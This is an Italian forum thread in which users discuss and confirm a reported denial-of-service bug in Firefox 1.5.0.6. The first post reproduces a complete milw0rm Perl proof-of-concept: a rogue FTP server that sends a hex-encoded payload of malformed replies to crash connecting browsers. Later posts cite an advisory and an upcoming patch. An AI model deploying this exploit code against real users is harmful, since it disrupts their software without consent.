Topic: Security Bug per Ff 1.5.0.6

[Generazione2000]

Ciao,

mi hanno riportato quanto segue e ne cercavo conferma, il bug viene riportato da milw0rm.com, ma senza descriverne le conseguenze.

Il codice è il seguente:

Codice: [Seleziona]

#!/usr/bin/perl
#author: tomas kempinsky

use strict;
use Socket;

my $port = shift || 2121;
my $proto = getprotobyname('tcp');
my $payload =
"\x32\x32\x30\x20\x5a\x0d\x0a\x33".
"\x33\x31\x20\x5a\x0d\x0a\x35\x30".
"\x30\x20\x44\x6f\x53\x0d\x0a\x35".
"\x30\x30\x20\x5a\x0d\x0a";


socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, 1) or die "setsock: $!";

my $paddr = sockaddr_in($port, INADDR_ANY);

bind(SERVER, $paddr) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
print "ftp://D:oS@\x0localhost:2121/\n";

my $client_addr;
while ($client_addr = accept(CLIENT, SERVER)) {
       # find out who connected
       my ($client_port, $client_ip) = sockaddr_in($client_addr);
       my $client_ipnum = inet_ntoa($client_ip);
       my $client_host = gethostbyaddr($client_ip, AF_INET);
       print ": $client_host", "[$client_ipnum]\n";
       # send them a message, close connection
       print CLIENT $payload;
       close CLIENT;
}

# milw0rm.com [2006-08-22]
Saluti

Stefano

[halifax]

Sicuro che riguardi la 1.5.0.6 e non una versione precedente?

[Generazione2000]

Si, riguarda la versione attuale, puoi vedere sul Sito stesso che l'ha pubblicata.
http://www.milw0rm.com
A me è stato riportato e nonl'ho trovata nei bug attuali

ciao

[Michele Dal Corso]

Sì è confermata:
http://www.securityfocus.com/bid/19678/info
ma si tratta di un problema DOS (ossia firefox si blocca) limitato alle connessioni ftp.

In ogni caso per il rilascio della 1.5.0.7 credo sia questione di ore... Il pacchetto è già pronto e credo stiano facendo gli ultimi test.

Ciao,
Michele

[halifax]

Strano che sul sito secunia non ci sia niente al riguardo, sollitamente sono tra i più celeri e affidabili su queste problematiche